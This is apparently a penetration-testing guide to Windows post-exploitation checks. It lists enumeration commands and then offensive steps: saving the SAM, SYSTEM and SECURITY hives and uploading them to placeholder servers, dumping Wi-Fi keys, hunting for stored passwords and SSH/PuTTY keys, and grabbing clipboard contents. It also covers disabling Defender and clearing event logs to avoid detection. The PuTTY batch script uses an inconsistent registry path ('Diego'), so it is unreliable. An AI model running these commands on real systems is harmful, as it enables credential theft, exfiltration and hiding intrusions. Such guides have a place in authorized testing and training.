Skip to content

Windows Awareness Checks

windowsAwareness-chacho

Introduction

When a penetration tester gains access to a Windows target, the primary goal is to gather as much information as possible about the environment. This includes performing various awareness checks to identify potential security risks, understand the current security posture, and gather intelligence for privilege escalation or further exploitation. This guide outlines a series of checks, grouped by categories, that should be performed immediately after gaining access to a Windows system.

System Information and Security Policies

Check System Information

Gather detailed information about the system, including the operating system version, architecture, and installed patches. This information is crucial for understanding the environment and identifying potential vulnerabilities.

systeminfo

Review Security Policies

Audit local security policies to understand password policies, user rights assignments, and audit policies, which can provide insights into the security posture of the system.

secedit /export /cfg C:\securitypolicy.cfg
or 
gpresult /z > C:\grouppolicy.txt

Check Windows Defender Status

Determine the status of Windows Defender, including real-time protection, malware signature versions, and last scan times.

powershell -Command "Get-MpComputerStatus"

Check PowerShell Execution Policy

Identify the PowerShell execution policy, which can indicate security settings or restrictions that might affect script execution.

powershell -Command "Get-ExecutionPolicy -List"

Check System Uptime

Knowing how long the system has been running can provide context on how fresh the environment is or how recently it was rebooted.

net stats srv

Identify Logged-In Remote Users

Determine if there are any active remote sessions on the machine, which could indicate ongoing legitimate or unauthorized access.

qwinsta

Process and Service Awareness

Check Integrity Level of a Process

Understanding the integrity level of a process is crucial for assessing potential privilege escalation opportunities.

  1. Retrieve detailed information about a process: 

    wmic process where processid=<ProcessID> get ExecutablePath,Name,ProcessId,OSName,Handle,ParentProcessId,Caption,CommandLine /FORMAT:LIST

  2. Check the integrity level and other security mitigations: 

    powershell -Command "(Get-Process -Id <ProcessID>).Path; (Get-Process -Id <ProcessID> | Get-ProcessMitigation).Process.MandatoryASLR"

List Running Processes

Identify all running processes, which can help in identifying potential targets for privilege escalation or identifying malicious processes.

tasklist
For a more detailed view, including processes from all users: 
tasklist /v

List and Check Services

Services running on the system could provide potential privilege escalation opportunities, especially if they are misconfigured.

  1. List all services: 

    sc query state= all
    or 
    wmic service list brief

  2. Check auto-start services and their configurations: 

    wmic service where "startmode='Auto'" get DisplayName,PathName,StartMode

Enumerate Scheduled Tasks

Scheduled tasks can be used for persistence or as part of an attack vector.

schtasks /query /fo LIST /v

Network Awareness and Configuration

Network Awareness Checks

Understanding the network configuration and active connections on the target system is essential.

  1. Display all active connections and listening ports: 

    netstat -a

  2. Display the executable associated with each connection or listening port: 

    netstat -b

  3. Display Ethernet statistics (e.g., bytes sent and received): 

    netstat -e

  4. Display the routing table: 

    netstat -r

  5. Display all connections, listening ports, and associated process IDs (PIDs): 

    netstat -ano

  6. Refresh the displayed network information every specified interval (in seconds): 

    netstat -an 5

Filtering Network Information

To narrow down the network information to specific criteria, such as connections on a particular port, use the findstr command.

netstat -ano | findstr :80

Network Interface Details

Gather detailed information about the network interfaces, including IP addresses, DNS settings, and network card details.

  1. View network configuration details: 

    ipconfig /all

  2. Get detailed information about network adapters: 

    wmic nic get Name, MACAddress, Manufacturer, NetConnectionStatus, Speed

List Open Shares

Enumerating open network shares can reveal shared resources that might be accessible, which can be useful for lateral movement.

net view \\<hostname>
net share

ARP Cache Inspection

Inspecting the ARP cache can provide insights into other devices on the network that the target machine has communicated with.

arp -a

DNS Cache Inspection

Reviewing the DNS cache can provide information about previously resolved domain names, which could reveal internal services or systems.

ipconfig /displaydns

User and Session Information

Enumerate Users and Session Details

Understanding who has access to the system and who is currently logged in can help identify potential accounts to target or sessions to hijack.

  1. List directories under C:\Users to identify user profiles: 

    dir C:\Users

  2. Find Security Identifiers (SIDs) for users on the host: 

    wmic useraccount get name,sid
    or 
    reg query HKU

  3. Enumerate domain users: 

    net user /domain

  4. Check who is currently logged in: 

    query user

Host and Environment Information

Gather basic system information, such as the hostname, NetBIOS name, and environment variables, to provide context about the target and assist in crafting further attacks.

  1. Get the hostname: 

    hostname
    or 
    echo %COMPUTERNAME%

  2. Get the NetBIOS name: 

    nbtstat -a <hostname>

  3. Check environment variables: 

    cmd /c set

Privilege Escalation Checks

Enumerate Local Administrators

Identifying which users have local administrative privileges is crucial, as it can help identify potential targets for privilege escalation.

net localgroup Administrators

Check for Unquoted Service Paths

Unquoted service paths can be exploited for privilege escalation, especially if the service is running with elevated privileges.

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Check for AlwaysInstallElevated

If the "AlwaysInstallElevated" policy is enabled, it allows users to install .msi files with elevated privileges, which could be exploited.

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

File System and Data Access

Search for Passwords in Configuration Files

Certain applications or scripts might store plaintext passwords in configuration files. Searching for common keywords related to credentials could reveal sensitive information.

findstr /si password *.xml *.ini *.txt

Look for SSH Keys

SSH keys can provide access to other systems or services. Searching the filesystem for key files is a good practice.

dir /s /b *id_rsa*

Find .ppk Files

Search for sensitive files, such as PuTTY private key files (.ppk), which can uncover valuable credentials or configuration details.

dir /s /b *.ppk

Display Contents of Interesting Files

If you find files that might contain sensitive information, such as text files, use the following command to display their contents:

type file1.txt file2.txt

Find Sessions Associated with a .ppk File

If PuTTY sessions exist on the target, identifying associated .ppk files can lead to discovering SSH keys used for remote access.

  1. List all SIDs in the HKU hive: 

    reg query HKU

  2. Check each SID for PuTTY sessions: 

    reg query "HKU\SID\Software\SimonTatham\PuTTY\Sessions"

  3. Inspect each session for the .ppk file path: 

    reg query "HKU\SID\Software\SimonTatham\PuTTY\Sessions\SessionName" /v PublicKeyFile

Alternatively, use a batch script to automate the search for .ppk file paths across all PuTTY sessions on the system:

@echo off
setlocal enabledelayedexpansion

for /f "tokens=*" %%i in ('reg query HKU') do (
    set "sid=%%i"
    if "!sid:~0,4!"=="HKEY" (
        echo Checking

 SID: !sid!
        for /f "tokens=*" %%j in ('reg query "!sid!\Software\Diego\PuTTY\Sessions" 2^>nul') do (
            set "session=%%j"
            if "!session:~0,4!"=="HKEY" (
                echo Checking session: !session!
                reg query "!session!" /v PublicKeyFile 2>nul | find /i "PublicKeyFile"
                if !errorlevel! equ 0 (
                    echo PPK file found in session: !session!
                    reg query "!session!" /v PublicKeyFile
                )
            )
        )
    )
)

endlocal

Persistence Mechanisms

Check for Startup Items

Malware or backdoors often add themselves to startup items to persist through reboots. Identifying these items can reveal persistence mechanisms.

wmic startup get caption,command

Check for Scheduled Tasks

While scheduled tasks were previously mentioned, focusing specifically on those set to execute with elevated privileges or at system boot can highlight persistence mechanisms.

schtasks /query /fo LIST /v | findstr /i "system"

Advanced Network Enumeration

Wireless Network Information

If the target is a laptop or a system that connects to wireless networks, enumerating stored wireless profiles can reveal saved credentials and network information.

  1. Enumerate Wireless Profiles: 

    netsh wlan show profiles

  2. Dump Wireless Network Keys: 

    netsh wlan show profile name="<ProfileName>" key=clear

Security and Registry Checks

What AntiVirus is Running

Identify what antivirus software is running on the target system, which could potentially interfere with your activities.

wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /format:list

Dump and Transfer Specific Registry Hives

Extracting specific registry hives can provide access to sensitive information, such as user credentials and system configurations. The following steps will guide you through dumping these hives and securely transferring them off the target system.

  1. Dump Specific Registry Hives: Save the SAM, SYSTEM, and SECURITY hives to files on the target system.
reg save HKLM\SAM C:\Windows\Temp\sam.save
reg save HKLM\SYSTEM C:\Windows\Temp\system.save
reg save HKLM\SECURITY C:\Windows\Temp\security.save

  1. Transfer the Dumped Hives Off the Target: After saving the hives, transfer them to a remote location where you can analyze them securely. Here are a few methods you can use:

  2. Using SMB: 

    copy C:\Windows\Temp\sam.save \\<your-smb-server>\share\sam.save
copy C:\Windows\Temp\system.save \\<your-smb-server>\share\system.save
copy C:\Windows\Temp\security.save \\<your-smb-server>\share\security.save

  3. Using FTP: 

    ftp <ftp-server-address>
put C:\Windows\Temp\sam.save
put C:\Windows\Temp\system.save
put C:\Windows\Temp\security.save

  4. Using PowerShell to upload to a web server: 

    $WebClient = New-Object System.Net.WebClient
$WebClient.UploadFile("http://<your-web-server>/upload/sam.save", "C:\Windows\Temp\sam.save")
$WebClient.UploadFile("http://<your-web-server>/upload/system.save", "C:\Windows\Temp\system.save")
$WebClient.UploadFile("http://<your-web-server>/upload/security.save", "C:\Windows\Temp\security.save")

  5. Clean Up: After transferring the files, delete the saved registry hives from the target system to avoid leaving traces. 

    del C:\Windows\Temp\sam.save
del C:\Windows\Temp\system.save
del C:\Windows\Temp\security.save

Review Event Logs

Check event logs for suspicious activities, such as failed logons, service failures, or security events.

wevtutil qe Security /rd:true /f:text /c:10

Kernel Debugging

Check if kernel debugging is enabled, as this can indicate a vulnerable state or debugging left on after testing.

bcdedit /dbgsettings

Anti-Malware Evasion

Disable Windows Defender (If Needed)

In certain situations, disabling Windows Defender may be necessary to execute certain actions or tools without detection.

Set-MpPreference -DisableRealtimeMonitoring $true

Cleaning Up Traces

Clear Event Logs

After completing actions on the system, it’s often necessary to clear event logs to avoid detection.

wevtutil cl System
wevtutil cl Security
wevtutil cl Application

Active Directory (if applicable)

Enumerate Domain Controllers and Trusts

If the target system is part of a domain, gathering information about domain controllers and trusts is critical.

nltest /dclist:<domain>
or 
nltest /trusted_domains

Gather Group Policy Information

Determine which Group Policies are applied and their settings.

gpresult /r /scope computer

Memory and Credentials

Dump LSA Secrets

Dumping LSA secrets can reveal cached credentials and other sensitive information stored by the Local Security Authority.

reg save HKLM\SYSTEM C:\Windows\Temp\system.save
reg save HKLM\SECURITY C:\Windows\Temp\security.save
Then, transfer these hives off the system for further analysis using a tool like Mimikatz to extract the secrets.

Dumping SAM Database

In addition to the registry hives, dumping the SAM database can directly provide user hashes that can be cracked offline.

reg save HKLM\SAM C:\Windows\Temp\sam.save

Clipboard Content

Capture Clipboard Data

The clipboard may contain sensitive information, such as passwords or commands copied by the user.

powershell -Command "Get-Clipboard"

Miscellaneous Checks

Identify Logged In Remote Users

Determine if there are any active remote sessions on the machine, which could indicate ongoing legitimate or unauthorized access.

qwinsta